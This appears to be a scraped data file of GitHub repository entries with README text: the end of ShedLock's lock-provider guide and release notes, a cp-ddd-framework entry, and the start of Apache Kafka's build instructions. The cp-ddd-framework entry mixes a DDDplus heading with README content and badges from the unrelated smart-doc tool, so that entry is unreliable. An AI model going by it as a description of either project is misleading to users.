return new ConsulLockProvider(consulClient);
}
```
Please, note that Consul lock provider uses [ecwid consul-api client](https://github.com/Ecwid/consul-api), which is part of spring cloud consul integration (the `spring-cloud-starter-consul-discovery` package).
#### ArangoDB
Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-arangodb5.13.0
```
Configure:
```java
import net.javacrumbs.shedlock.provider.arangodb.ArangoLockProvider;
...
@Bean
public ArangoLockProvider lockProvider(final ArangoOperations arangoTemplate) {
return new ArangoLockProvider(arangoTemplate.driver().db(DB_NAME));
}
```
Please, note that ArangoDB lock provider uses ArangoDB driver v6.7, which is part of [arango-spring-data](https://github.com/arangodb/spring-data) in version 3.3.0.
#### Neo4j
Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-neo4j5.13.0
```
Configure:
```java
import net.javacrumbs.shedlock.core.LockConfiguration;
...
@Bean
Neo4jLockProvider lockProvider(org.neo4j.driver.Driver driver) {
return new Neo4jLockProvider(driver);
}
```
Please make sure that ```neo4j-java-driver``` version used by ```shedlock-provider-neo4j``` matches the driver version used in your
project (if you use `spring-boot-starter-data-neo4j`, it is probably provided transitively).
#### Etcd
Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-etcd-jetcd5.13.0
```
Configure:
```java
import net.javacrumbs.shedlock.provider.etcd.jetcd.EtcdLockProvider;
...
@Bean
public LockProvider lockProvider(Client client) {
return new EtcdLockProvider(client);
}
```
#### Apache Ignite
Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-ignite5.13.0
```
Configure:
```java
import net.javacrumbs.shedlock.provider.ignite.IgniteLockProvider;
...
@Bean
public LockProvider lockProvider(Ignite ignite) {
return new IgniteLockProvider(ignite);
}
```
#### In-Memory
If you want to use a lock provider in tests there is an in-Memory implementation.
Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-inmemory5.13.0test
```
```java
import net.javacrumbs.shedlock.provider.inmemory.InMemoryLockProvider;
...
@Bean
public LockProvider lockProvider() {
return new InMemoryLockProvider();
}
```
#### Memcached (using spymemcached)
Please, be aware that memcached is not a database but a cache. It means that if the cache is full,
[the lock may be released prematurely](https://stackoverflow.com/questions/6868256/memcached-eviction-prior-to-key-expiry/10456364#10456364)
**Use only if you know what you are doing.**
Import
```xml
net.javacrumbs.shedlockshedlock-provider-memcached-spy5.13.0
```
and configure
```java
import net.javacrumbs.shedlock.provider.memcached.spy.MemcachedLockProvider;
...
@Bean
public LockProvider lockProvider(net.spy.memcached.MemcachedClient client) {
return new MemcachedLockProvider(client, ENV);
}
```
P.S.:
Memcached Standard Protocol:
- A key (arbitrary string up to 250 bytes in length. No space or newlines for ASCII mode)
- An expiration time, in `seconds`. '0' means never expire. Can be up to 30 days. After 30 days, is treated as a unix timestamp of an exact date. (support `seconds`、`minutes`、`days`, and less than `30` days)
#### Datastore
Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-datastore5.13.0
```
and configure
```java
import net.javacrumbs.shedlock.provider.datastore.DatastoreLockProvider;
...
@Bean
public LockProvider lockProvider(com.google.cloud.datastore.Datastore datastore) {
return new DatastoreLockProvider(datastore);
}
```
#### Spanner
Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-spanner5.13.0
```
Configure
```java
import net.javacrumbs.shedlock.provider.spanner.SpannerLockProvider;
...
// Basic
@Bean
public LockProvider lockProvider(DatabaseClient databaseClient) {
return new SpannerLockProvider(databaseClientSupplier);
}
// Custom host, table and column names
@Bean
public LockProvider lockProvider(DatabaseClient databaseClient) {
var config = SpannerLockProvider.Configuration.builder()
.withDatabaseClient(databaseClientSupplier)
.withTableConfiguration(SpannerLockProvider.TableConfiguration.builder()
...
// Custom table and column names
.build())
.withHostName(""customHostName"")
.build();
return new SpannerLockProvider(config);
}
```
## Multi-tenancy
If you have multi-tenancy use-case you can use a lock provider similar to this one
(see the full [example](https://github.com/lukas-krecan/ShedLock/blob/master/providers/jdbc/shedlock-provider-jdbc-template/src/test/java/net/javacrumbs/shedlock/provider/jdbctemplate/MultiTenancyLockProviderIntegrationTest.java#L87))
```java
private static abstract class MultiTenancyLockProvider implements LockProvider {
private final ConcurrentHashMap providers = new ConcurrentHashMap<>();
@Override
public @NonNull Optional lock(@NonNull LockConfiguration lockConfiguration) {
String tenantName = getTenantName(lockConfiguration);
return providers.computeIfAbsent(tenantName, this::createLockProvider).lock(lockConfiguration);
}
protected abstract LockProvider createLockProvider(String tenantName) ;
protected abstract String getTenantName(LockConfiguration lockConfiguration);
}
```
## Customization
You can customize the behavior of the library by implementing `LockProvider` interface. Let's say you want to implement
a special behavior after a lock is obtained. You can do it like this:
```java
public class MyLockProvider implements LockProvider {
private final LockProvider delegate;
public MyLockProvider(LockProvider delegate) {
this.delegate = delegate;
}
@Override
public Optional lock(LockConfiguration lockConfiguration) {
Optional lock = delegate.lock(lockConfiguration);
if (lock.isPresent()) {
// do something
}
return lock;
}
}
```
## Duration specification
All the annotations where you need to specify a duration support the following formats
* duration+unit - `1s`, `5ms`, `5m`, `1d` (Since 4.0.0)
* duration in ms - `100` (only Spring integration)
* ISO-8601 - `PT15M` (see [Duration.parse()](https://docs.oracle.com/javase/8/docs/api/java/time/Duration.html#parse-java.lang.CharSequence-) documentation)
## Extending the lock
There are some use-cases which require to extend currently held lock. You can use LockExtender in the
following way:
```java
LockExtender.extendActiveLock(Duration.ofMinutes(5), ZERO);
```
Please note that not all lock provider implementations support lock extension.
## KeepAliveLockProvider
There is also KeepAliveLockProvider that is able to keep the lock alive by periodically extending it. It can be
used by wrapping the original lock provider. My personal opinion is that it should be used only in special cases,
it adds more complexity to the library and the flow is harder to reason about so please use moderately.
```java
@Bean
public LockProvider lockProvider(...) {
return new KeepAliveLockProvider(new XyzProvider(...), scheduler);
}
```
KeepAliveLockProvider extends the lock in the middle of the lockAtMostFor interval. For example, if the lockAtMostFor
is 10 minutes the lock is extended every 5 minutes for 10 minutes until the lock is released. Please note that the minimal
lockAtMostFor time supported by this provider is 30s. The scheduler is used only for the lock extension, single thread
should be enough.
## Micronaut integration
Since version 4.0.0, it's possible to use Micronaut framework for integration
Import the project:
```xml
net.javacrumbs.shedlockshedlock-micronaut5.13.0
```
Configure default lockAtMostFor value (application.yml):
```yaml
shedlock:
defaults:
lock-at-most-for: 1m
```
Configure lock provider:
```java
@Singleton
public LockProvider lockProvider() {
... select and configure your lock provider
}
```
Configure the scheduled task:
```java
@Scheduled(fixedDelay = ""1s"")
@SchedulerLock(name = ""myTask"")
public void myTask() {
assertLocked();
...
}
```
## CDI integration
Since version 5.0.0, it's possible to use CDI for integration (tested only with Quarkus)
Import the project:
```xml
net.javacrumbs.shedlockshedlock-cdi5.13.0
```
Configure default lockAtMostFor value (application.properties):
```properties
shedlock.defaults.lock-at-most-for=PT30S
```
Configure lock provider:
```java
@Produces
@Singleton
public LockProvider lockProvider() {
...
}
```
Configure the scheduled task:
```java
@Scheduled(every = ""1s"")
@SchedulerLock(name = ""myTask"")
public void myTask() {
assertLocked();
...
}
```
The implementation only depends on `jakarta.enterprise.cdi-api` and `microprofile-config-api` so it should be
usable in other CDI compatible frameworks, but it has not been tested with anything else than Quarkus. It's
built on top of javax annotation as Quarkus has not moved to Jakarta EE namespace yet.
The support is minimalistic, for example there is no support for expressions in the annotation parameters yet,
if you need it, feel free to send a PR.
## Locking without a framework
It is possible to use ShedLock without a framework
```java
LockingTaskExecutor executor = new DefaultLockingTaskExecutor(lockProvider);
...
Instant lockAtMostUntil = Instant.now().plusSeconds(600);
executor.executeWithLock(runnable, new LockConfiguration(""lockName"", lockAtMostUntil));
```
## Extending the lock
Some lock providers support extension of the lock. For the time being, it requires manual lock manipulation,
directly using `LockProvider` and calling `extend` method on the `SimpleLock`.
## Modes of Spring integration
ShedLock supports two modes of Spring integration. One that uses an AOP proxy around scheduled method (PROXY_METHOD)
and one that proxies TaskScheduler (PROXY_SCHEDULER)
#### Scheduled Method proxy
Since version 4.0.0, the default mode of Spring integration is an AOP proxy around the annotated method.
The main advantage of this mode is that it plays well with other frameworks that want to somehow alter the default Spring scheduling mechanism.
The disadvantage is that the lock is applied even if you call the method directly. If the method returns a value and the lock is held
by another process, null or an empty Optional will be returned (primitive return types are not supported).
Final and non-public methods are not proxied so either you have to make your scheduled methods public and non-final or use TaskScheduler proxy.
![Method proxy sequenceDiagram](https://github.com/lukas-krecan/ShedLock/raw/master/documentation/method_proxy.png)
#### TaskScheduler proxy
This mode wraps Spring `TaskScheduler` in an AOP proxy. **This mode does not play well with instrumentation libraries**
like opentelementry that also wrap TaskScheduler. Please only use it if you know what you are doing.
It can be switched-on like this (PROXY_SCHEDULER was the default method before 4.0.0):
```java
@EnableSchedulerLock(interceptMode = PROXY_SCHEDULER)
```
If you do not specify your task scheduler, a default one is created for you. If you have special needs, just create a bean implementing `TaskScheduler`
interface and it will get wrapped into the AOP proxy automatically.
```java
@Bean
public TaskScheduler taskScheduler() {
return new MySpecialTaskScheduler();
}
```
Alternatively, you can define a bean of type `ScheduledExecutorService` and it will automatically get used by the tasks
scheduling mechanism.
![TaskScheduler proxy sequence diagram](https://github.com/lukas-krecan/ShedLock/raw/master/documentation/scheduler_proxy.png)
### Spring XML configuration
Spring XML configuration is not supported as of version 3.0.0. If you need it, please use version 2.6.0 or file an issue explaining why it is needed.
## Lock assert
To prevent misconfiguration errors, like AOP misconfiguration, missing annotation etc., you can assert that the lock
works by using LockAssert:
```java
@Scheduled(...)
@SchedulerLock(..)
public void scheduledTask() {
// To assert that the lock is held (prevents misconfiguration errors)
LockAssert.assertLocked();
// do something
}
```
In unit tests you can switch-off the assertion by calling `LockAssert.TestHelper.makeAllAssertsPass(true)` on given thread (as in this [example](https://github.com/lukas-krecan/ShedLock/commit/e8d63b7c56644c4189e0a8b420d8581d6eae1443)).
## Kotlin gotchas
The library is tested with Kotlin and works fine. The only issue is Spring AOP which does not work on final method. If you use `@SchedulerLock` with `@Component`
annotation, everything should work since Kotlin Spring compiler plugin will automatically 'open' the method for you. If `@Component` annotation is not present, you
have to open the method by yourself. (see [this issue](https://github.com/lukas-krecan/ShedLock/issues/1268) for more details)
## Caveats
Locks in ShedLock have an expiration time which leads to the following possible issues.
1. If the task runs longer than `lockAtMostFor`, the task can be executed more than once
2. If the clock difference between two nodes is more than `lockAtLeastFor` or minimal execution time the task can be
executed more than once.
## Troubleshooting
Help, ShedLock does not do what it's supposed to do!
1. Upgrade to the newest version
2. Use [LockAssert](https://github.com/lukas-krecan/ShedLock#lock-assert) to ensure that AOP is correctly configured.
- If it does not work, please read about Spring AOP internals (for example [here](https://docs.spring.io/spring-framework/docs/current/reference/html/core.html#aop-proxying))
3. Check the storage. If you are using JDBC, check the ShedLock table. If it's empty, ShedLock is not properly configured.
If there is more than one record with the same name, you are missing a primary key.
4. Use ShedLock debug log. ShedLock logs interesting information on DEBUG level with logger name `net.javacrumbs.shedlock`.
It should help you to see what's going on.
5. For short-running tasks consider using `lockAtLeastFor`. If the tasks are short-running, they could be executed one
after another, `lockAtLeastFor` can prevent it.
# Release notes
## 5.13.0 (2024-04-05)
* #1779 Ability to rethrow unexpected exception in JdbcTemplateStorageAccessor
* Dependency updates
## 5.12.0 (2024-02-29)
* #1800 Enable lower case for database type when using usingDbTime()
* #1804 Startup error with Neo4j 5.17.0
* Dependency updates
## 4.47.0 (2024-03-01)
* #1800 Enable lower case for database type when using usingDbTime() (thanks @yuagu1)
## 5.11.0 (2024-02-13)
* #1753 Fix SpEL for methods with parameters
* Dependency updates
## 5.10.2 (2023-12-07)
* #1635 fix makeAllAssertsPass locks only once
* Dependency updates
## 5.10.1 (2023-12-06)
* #1635 fix makeAllAssertsPass(false) throws NoSuchElementException
* Dependency updates
## 5.10.0 (2023-11-07)
* SpannerLockProvider added (thanks @pXius)
* Dependency updates
## 5.9.1 (2023-10-19)
* QuarkusRedisLockProvider supports Redis 6.2 (thanks @ricardojlrufino)
## 5.9.0 (2023-10-15)
* Support Quarkus 2 Redis client (thanks @ricardojlrufino)
* Better handling of timeouts in ReactiveStreamsMongoLockProvider
* Dependency updates
## 5.8.0 (2023-09-15)
* Support for Micronaut 4
* Use Merge instead of Insert for Oracle #1528 (thanks @xmojsic)
* Dependency updates
## 5.7.0 (2023-08-25)
* JedisLockProvider supports extending (thanks @shotmk)
* Better behavior when locks are nested #1493
## 4.46.0 (2023-09-05)
* JedisLockProvider (version 3) supports extending (thanks @shotmk)
## 4.45.0 (2023-09-04)
* JedisLockProvider supports extending (thanks @shotmk)
## 5.6.0
* Ability to explicitly set database product in JdbTemplateLockProvider (thanks @metron2)
* Removed forgotten versions from BOM
* Dependency updates
## 5.5.0 (2023-06-19)
* Datastore support (thanks @mmastika)
* Dependency updates
## 5.4.0 (2023-06-06)
* Handle [uncategorized SQL exceptions](https://github.com/lukas-krecan/ShedLock/pull/1442) (thanks @jaam)
* Dependency updates
## 5.3.0 (2023-05-13)
* Added shedlock-cdi module (supports newest CDI version)
* Dependency updates
## 5.2.0 (2023-03-06)
* Uppercase in JdbcTemplateProvider (thanks @Ragin-LundF)
* Dependency updates
## 5.1.0 (2023-01-07)
* Added SpEL support to @SchedulerLock name attribute (thanks @ipalbeniz)
* Dependency updates
## 5.0.1 (2022-12-10)
* Work around broken Spring 6 exception translation https://github.com/lukas-krecan/ShedLock/issues/1272
## 4.44.0 (2022-12-29)
* Insert ignore for MySQL https://github.com/lukas-krecan/ShedLock/commit/8a4ae7ad8103bb47f55d43bccf043ca261c24d7a
## 5.0.0 (2022-12-10)
* Requires JDK 17
* Tested with Spring 6 (Spring Boot 3)
* Micronaut updated to 3.x.x
* R2DBC 1.x.x (still sucks)
* Spring Data 3.x.x
* Rudimentary support for CDI (tested with quarkus)
* New jOOQ lock provider
* SLF4j 2
* Deleted all deprecated code and support for old versions of libraries
## 4.43.0 (2022-12-04)
* Better logging in JdbcTemplateProvider
* Dependency updates
## 4.42.0 (2022-09-16)
* Deprecate old Couchbase lock provider
* Dependency updates
## 4.41.0 (2022-08-17)
* Couchbase collection support (thanks @mesuutt)
* Dependency updates
## 4.40.0 (2022-08-11)
* Fixed caching issues when the app is started by the DB does not exist yet (#1129)
* Dependency updates
## 4.39.0 (2022-07-26)
* Introduced elasticsearch8 LockProvider and deperecated the orignal one (thanks @MarAra)
* Dependency updates
## 4.38.0 (2022-07-02)
* ReactiveRedisLockProvider added (thanks @ericwcc)
* Dependency updates
## 4.37.0 (2022-06-14)
* OpenSearch provider (thanks @Pinny3)
* Fix wrong reference to reactive Mongo in BOM #1048
* Dependency updates
## 4.36.0 (2022-05-28)
* shedlock-bom module added
* Dependency updates
## 4.35.0 (2022-05-16)
* Neo4j allows to specify database thanks @SergeyPlatonov
* Dependency updates
## 4.34.0 (2022-04-09)
* Dropped support for Hazelcast <= 3 as it has unfixed vulnerability
* Dropped support for Spring Data Redis 1 as it is not supported
* Dependency updates
## 4.33.0
* memcached provider added (thanks @pinkhello)
* Dependency updates
## 4.32.0
* JDBC provider does not change autocommit attribute
* Dependency updates
## 4.31.0
* Jedis 4 lock provider
* Dependency updates
## 4.30.0
* In-memory lock provider added (thanks @kkocel)
* Dependency updates
## 4.29.0
* R2DBC support added (thanks @sokomishalov)
* Library upgrades
## 4.28.0
* Neo4j lock provider added (thanks @thimmwork)
* Library upgrades
## 4.27.0
* Ability to set transaction isolation in JdbcTemplateLockProvider
* Library upgrades
## 4.26.0
* KeepAliveLockProvider introduced
* Library upgrades
## 4.25.0
* LockExtender added
## 4.24.0
* Support for Apache Ignite (thanks @wirtsleg)
* Library upgrades
## 4.23.0
* Ability to set serialConsistencyLevel in Cassandra (thanks @DebajitKumarPhukan)
* Introduced shedlock-provider-jdbc-micronaut module (thanks @drmaas)
## 4.22.1
* Catching and logging Cassandra exception
## 4.22.0
* Support for custom keyspace in Cassandra provider
## 4.21.0
* Elastic unlock using IMMEDIATE refresh policy #422
* DB2 JDBC lock provider uses microseconds in DB time
* Various library upgrades
## 4.20.1
* Fixed DB JDBC server time #378
## 4.20.0
* Support for etcd (thanks grofoli)
## 4.19.1
* Fixed devtools compatibility #368
## 4.19.0
* Support for enhanced configuration in Cassandra provider (thanks DebajitKumarPhukan)
* LockConfigurationExtractor exposed as a Spring bean #359
* Handle CannotSerializeTransactionException #364
## 4.18.0
* Fixed Consul support for tokens and added enhanced Consul configuration (thanks DrWifey)
## 4.17.0
* Consul support for tokens
## 4.16.0
* Spring - EnableSchedulerLock.order param added to specify AOP proxy order
* JDBC - Log unexpected exceptions at ERROR level
* Hazelcast upgraded to 4.1
## 4.15.1
* Fix session leak in Consul provider #340 (thanks @haraldpusch)
## 4.15.0
* ArangoDB lock provider added (thanks @patrick-birkle)
## 4.14.0
* Support for Couchbase 3 driver (thanks @blitzenzzz)
* Removed forgotten configuration files form micronaut package (thanks @drmaas)
* Shutdown hook for Consul (thanks @kaliy)
## 4.13.0
* Support for Consul (thanks @kaliy)
* Various dependencies updated
* Deprecated default LockConfiguration constructor
## 4.12.0
* Lazy initialization of SqlStatementsSource #258
## 4.11.1
* MongoLockProvider uses mongodb-driver-sync
* Removed deprecated constructors from MongoLockProvider
## 4.10.1
* New Mongo reactive streams driver (thanks @codependent)
## 4.9.3
* Fixed JdbcTemplateLockProvider useDbTime() locking #244 thanks @gjorgievskivlatko
## 4.9.2
* Do not fail on DB type determining code if DB connection is not available
## 4.9.1
* Support for server time in DB2
* removed shedlock-provider-jdbc-internal module
## 4.9.0
* Support for server time in JdbcTemplateLockProvider
* Using custom non-null annotations
* Trimming time precision to milliseconds
* Micronaut upgraded to 1.3.4
* Add automatic DB tests for Oracle, MariaDB and MS SQL.
## 4.8.0
* DynamoDB 2 module introduced (thanks Mark Egan)
* JDBC template code refactored to not log error on failed insert in Postgres
* INSERT .. ON CONFLICT UPDATE is used for Postgres
## 4.7.1
* Make LockAssert.TestHelper public
## 4.7.0
* New module for Hazelcasts 4
* Ability to switch-off LockAssert in unit tests
## 4.6.0
* Support for Meta annotations and annotation inheritance in Spring
## 4.5.2
* Made compatible with PostgreSQL JDBC Driver 42.2.11
## 4.5.1
* Inject redis template
## 4.5.0
* ClockProvider introduced
* MongoLockProvider(MongoDatabase) introduced
## 4.4.0
* Support for non-void returning methods when PROXY_METHOD interception is used
## 4.3.1
* Introduced shedlock-provider-redis-spring-1 to make it work around Spring Data Redis 1 issue #105 (thanks @rygh4775)
## 4.3.0
* Jedis dependency upgraded to 3.2.0
* Support for JedisCluster
* Tests upgraded to JUnit 5
## 4.2.0
* Cassandra provider (thanks @mitjag)
## 4.1.0
* More configuration option for JdbcTemplateProvider
## 4.0.4
* Allow configuration of key prefix in RedisLockProvider #181 (thanks @krm1312)
## 4.0.3
* Fixed junit dependency scope #179
## 4.0.2
* Fix NPE caused by Redisson #178
## 4.0.1
* DefaultLockingTaskExecutor made reentrant #175
## 4.0.0
Version 4.0.0 is a major release changing quite a lot of stuff
* `net.javacrumbs.shedlock.core.SchedulerLock` has been replaced by `net.javacrumbs.shedlock.spring.annotation.SchedulerLock`. The original annotation has been in wrong module and
was too complex. Please use the new annotation, the old one still works, but in few years it will be removed.
* Default intercept mode changed from `PROXY_SCHEDULER` to `PROXY_METHOD`. The reason is that there were a lot of issues with `PROXY_SCHEDULER` (for example #168). You can still
use `PROXY_SCHEDULER` mode if you specify it manually.
* Support for more readable [duration strings](#duration-specification)
* Support for lock assertion `LockAssert.assertLocked()`
* [Support for Micronaut](#micronaut-integration) added
## 3.0.1
* Fixed bean definition configuration #171
## 3.0.0
* `EnableSchedulerLock.mode` renamed to `interceptMode`
* Use standard Spring AOP configuration to honor Spring Boot config (supports `proxyTargetClass` flag)
* Removed deprecated SpringLockableTaskSchedulerFactoryBean and related classes
* Removed support for XML configuration
## 2.6.0
* Updated dependency to Spring 2.1.9
* Support for lock extensions (beta)
## 2.5.0
* Zookeeper supports *lockAtMostFor* and *lockAtLeastFor* params
* Better debug logging
## 2.4.0
* Fixed potential deadlock in Hazelcast (thanks @HubertTatar)
* Finding class level annotation in proxy method mode (thanks @volkovs)
* ScheduledLockConfigurationBuilder deprecated
## 2.3.0
* LockProvides is initialized lazilly so it does not change DataSource initialization order
## 2.2.1
* MongoLockProvider accepts MongoCollection as a constructor param
## 2.2.0
* DynamoDBLockProvider added
## 2.1.0
* MongoLockProvider rewritten to use upsert
* ElasticsearchLockProvider added
## 2.0.1
* AOP proxy and annotation configuration support
## 1.3.0
* Can set Timezone to JdbcTemplateLock provider
## 1.2.0
* Support for Couchbase (thanks to @MoranVaisberg)
## 1.1.1
* Spring RedisLockProvider refactored to use RedisTemplate
## 1.1.0
* Support for transaction manager in JdbcTemplateLockProvider (thanks to @grmblfrz)
## 1.0.0
* Upgraded dependencies to Spring 5 and Spring Data 2
* Removed deprecated net.javacrumbs.shedlock.provider.jedis.JedisLockProvider (use net.javacrumbs.shedlock.provider.redis.jedis.JedisLockProvide instead)
* Removed deprecated SpringLockableTaskSchedulerFactory (use ScheduledLockConfigurationBuilder instead)
## 0.18.2
* ablility to clean lock cache
## 0.18.1
* shedlock-provider-redis-spring made compatible with spring-data-redis 1.x.x
## 0.18.0
* Added shedlock-provider-redis-spring (thanks to @siposr)
* shedlock-provider-jedis moved to shedlock-provider-redis-jedis
## 0.17.0
* Support for SPEL in lock name annotation
## 0.16.1
* Automatically closing TaskExecutor on Spring shutdown
## 0.16.0
* Removed spring-test from shedlock-spring compile time dependencies
* Added Automatic-Module-Names
## 0.15.1
* Hazelcast works with remote cluster
## 0.15.0
* Fixed ScheduledLockConfigurationBuilder interfaces #32
* Hazelcast code refactoring
## 0.14.0
* Support for Hazelcast (thanks to @peyo)
## 0.13.0
* Jedis constructor made more generic (thanks to @mgrzeszczak)
## 0.12.0
* Support for property placeholders in annotation lockAtMostForString/lockAtLeastForString
* Support for composed annotations
* ScheduledLockConfigurationBuilder introduced (deprecating SpringLockableTaskSchedulerFactory)
## 0.11.0
* Support for Redis (thanks to @clamey)
* Checking that lockAtMostFor is in the future
* Checking that lockAtMostFor is larger than lockAtLeastFor
## 0.10.0
* jdbc-template-provider does not participate in task transaction
## 0.9.0
* Support for @SchedulerLock annotations on proxied classes
## 0.8.0
* LockableTaskScheduler made AutoClosable so it's closed upon Spring shutdown
## 0.7.0
* Support for lockAtLeastFor
## 0.6.0
* Possible to configure defaultLockFor time so it does not have to be repeated in every annotation
## 0.5.0
* ZooKeeper nodes created under /shedlock by default
## 0.4.1
* JdbcLockProvider insert does not fail on DataIntegrityViolationException
## 0.4.0
* Extracted LockingTaskExecutor
* LockManager.executeIfNotLocked renamed to executeWithLock
* Default table name in JDBC lock providers
## 0.3.0
* `@ShedlulerLock.name` made obligatory
* `@ShedlulerLock.lockForMillis` renamed to lockAtMostFor
* Adding plain JDBC LockProvider
* Adding ZooKeepr LockProvider
"
funkygao/cp-ddd-framework,master,1081,262,2020-09-07T14:03:55Z,19098,2,轻量级DDD正向/逆向业务建模框架,支撑复杂业务系统的架构演化!,architecture clean-architecture ddd ddd-architecture dddplus domain-driven-design enterprise-architecture extension framework modeling reverse-engineering,"
DDDplus
A lightweight DDD(Domain Driven Design) enhancement framework for forward/reverse business modeling, supporting complex system architecture evolution!
[![CI](https://github.com/funkygao/cp-ddd-framework/workflows/CI/badge.svg?branch=master)](https://github.com/funkygao/cp-ddd-framework/actions?query=branch%3Amaster+workflow%3ACI)
[![Javadoc](https://img.shields.io/badge/javadoc-Reference-blue.svg)](https://funkygao.github.io/cp-ddd-framework/doc/apidocs/)
[![Maven Central](https://img.shields.io/maven-central/v/io.github.dddplus/dddplus.svg?label=Maven%20Central)](https://central.sonatype.com/namespace/io.github.dddplus)
![Requirement](https://img.shields.io/badge/JDK-8+-blue.svg)
[![Coverage Status](https://img.shields.io/codecov/c/github/funkygao/cp-ddd-framework.svg)](https://codecov.io/gh/funkygao/cp-ddd-framework)
[![Mentioned in Awesome DDD](https://awesome.re/mentioned-badge.svg)](https://github.com/heynickc/awesome-ddd#jvm)
[![Gitter chat](https://img.shields.io/badge/gitter-join%20chat%20%E2%86%92-brightgreen.svg)](https://gitter.im/cp-ddd-framework/community)
![maven](https://img.shields.io/maven-central/v/com.ly.smart-doc/smart-doc)
[![License](https://img.shields.io/badge/license-Apache%202-green.svg)](https://www.apache.org/licenses/LICENSE-2.0)
![number of issues closed](https://img.shields.io/github/issues-closed-raw/smart-doc-group/smart-doc)
![closed pull requests](https://img.shields.io/github/issues-pr-closed/smart-doc-group/smart-doc)
![java version](https://img.shields.io/badge/JAVA-1.8+-green.svg)
[![chinese](https://img.shields.io/badge/chinese-中文文档-brightgreen)](https://smart-doc-group.github.io/#/zh-cn/)
![gitee star](https://gitee.com/smart-doc-team/smart-doc/badge/star.svg)
![git star](https://img.shields.io/github/stars/smart-doc-group/smart-doc.svg)
## Introduce
`smart-doc[smɑːt dɒk]`is a tool that supports both `JAVA REST API` and `JAVA WebSocket` and `Apache Dubbo RPC` interface document generation. `Smart-doc` is
based on interface source code analysis to generate interface documents, and zero annotation intrusion. You only need to
write Javadoc comments when developing, `smart-doc` can help you generate `Markdown` or `HTML5` document. `smart-doc` does not
need to inject annotations into the code like `Swagger`.
[quick start](https://smart-doc-group.github.io/#/)
## Documentation
* [English](https://smart-doc-group.github.io/#/)
* [中文](https://smart-doc-group.github.io/#/zh-cn/)
## Features
- Zero annotation, zero learning cost, only need to write standard `JAVA` document comments.
- Automatic derivation based on source code interface definition, powerful return structure derivation support.
- Support `Spring MVC`, `Spring Boot`, `Spring Boot Web Flux` (Not support endpoint), `Feign`,`JAX-RS`.
- Supports the derivation of asynchronous interface returns such as `Callable`, `Future`, `CompletableFuture`.
- Support `JSR-303`parameter verification specification.
- Support for automatic generation of request examples based on request parameters.
- Support for generating `JSON` return value examples.
- Support for loading source code from outside the project to generate field comments (including the sources jar
package).
- Support for generating multiple formats of documents: `Markdown`,`HTML5`,`Word`,`Asciidoctor`,`Postman Collection 2.0+`,`OpenAPI 3.0`.
- Support the generation of `Jmeter` performance testing scripts
- Support for exporting error codes and data dictionary codes to API documentation.
- The debug html5 page fully supports file upload and download testing.
- Support `Apache Dubbo RPC`.
## Best Practice
`smart-doc` + [Torna](http://torna.cn) form an industry-leading document generation and management solution, using
`smart-doc` to complete Java source code analysis and extract annotations to generate API documents without intrusion, and
automatically push the documents to the `Torna` enterprise-level interface document management platform.
![smart-doc+torna](https://raw.githubusercontent.com/shalousun/smart-doc/master/images/smart-doc-torna-en.png)
## Building
You could build with the following commands. (`JDK 1.8` is required to build the master branch)
```
mvn clean install -Dmaven.test.skip=true
```
## TODO
- GRPC
## Who is using
These are only part of the companies using `smart-doc`, for reference only. If you are using smart-doc,
please [add your company here](https://github.com/smart-doc-group/smart-doc/issues/12) to tell us your scenario to make
`smart-doc` better.
![IFLYTEK](https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/iflytek.png)
## Acknowledgements
Thanks to [JetBrains SoftWare](https://www.jetbrains.com) for providing free Open Source license for this project.
## License
`Smart-doc` is under the Apache 2.0 license. See
the [LICENSE](https://github.com/smart-doc-group/smart-doc/blob/master/LICENSE)
file for details.
## Contact
Email: opensource@ly.com
"
apache/kafka,trunk,27284,13446,2011-08-15T18:06:16Z,183068,1084,Mirror of Apache Kafka,kafka scala,"Apache Kafka
=================
See our [web site](https://kafka.apache.org) for details on the project.
You need to have [Java](http://www.oracle.com/technetwork/java/javase/downloads/index.html) installed.
We build and test Apache Kafka with Java 8, 11, 17 and 21. We set the `release` parameter in javac and scalac
to `8` to ensure the generated binaries are compatible with Java 8 or higher (independently of the Java version
used for compilation). Java 8 support project-wide has been deprecated since Apache Kafka 3.0, Java 11 support for
the broker and tools has been deprecated since Apache Kafka 3.7 and removal of both is planned for Apache Kafka 4.0 (
see [KIP-750](https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=181308223) and
[KIP-1013](https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=284789510) for more details).
Scala 2.12 and 2.13 are supported and 2.13 is used by default. Scala 2.12 support has been deprecated since
Apache Kafka 3.0 and will be removed in Apache Kafka 4.0 (see [KIP-751](https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=181308218)
for more details). See below for how to use a specific Scala version or all of the supported Scala versions.
### Build a jar and run it ###
./gradlew jar
Follow instructions in https://kafka.apache.org/quickstart
### Build source jar ###
./gradlew srcJar
### Build aggregated javadoc ###
./gradlew aggregatedJavadoc
### Build javadoc and scaladoc ###
./gradlew javadoc
./gradlew javadocJar # builds a javadoc jar for each module
./gradlew scaladoc
./gradlew scaladocJar # builds a scaladoc jar for each module
./gradlew docsJar # builds both (if applicable) javadoc and scaladoc jars for each module
### Run unit/integration tests ###
./gradlew test # runs both unit and integration tests
./gradlew unitTest
./gradlew integrationTest
### Force re-running tests without code change ###
./gradlew test --rerun
./gradlew unitTest --rerun
./gradlew integrationTest --rerun
### Running a particular unit/integration test ###
./gradlew clients:test --tests RequestResponseTest
### Repeatedly running a particular unit/integration test ###
I=0; while ./gradlew clients:test --tests RequestResponseTest --rerun --fail-fast; do (( I=$I+1 )); echo ""Completed run: $I""; sleep 1; done
### Running a particular test method within a unit/integration test ###
./gradlew core:test --tests kafka.api.ProducerFailureHandlingTest.testCannotSendToInternalTopic
./gradlew clients:test --tests org.apache.kafka.clients.MetadataTest.testTimeToNextUpdate
### Running a particular unit/integration test with log4j output ###
By default, there will be only small number of logs output while testing. You can adjust it by changing the `log4j.properties` file in the module's `src/test/resources` directory.
For example, if you want to see more logs for clients project tests, you can modify [the line](https://github.com/apache/kafka/blob/trunk/clients/src/test/resources/log4j.properties#L21) in `clients/src/test/resources/log4j.properties`
to `log4j.logger.org.apache.kafka=INFO` and then run:
./gradlew cleanTest clients:test --tests NetworkClientTest
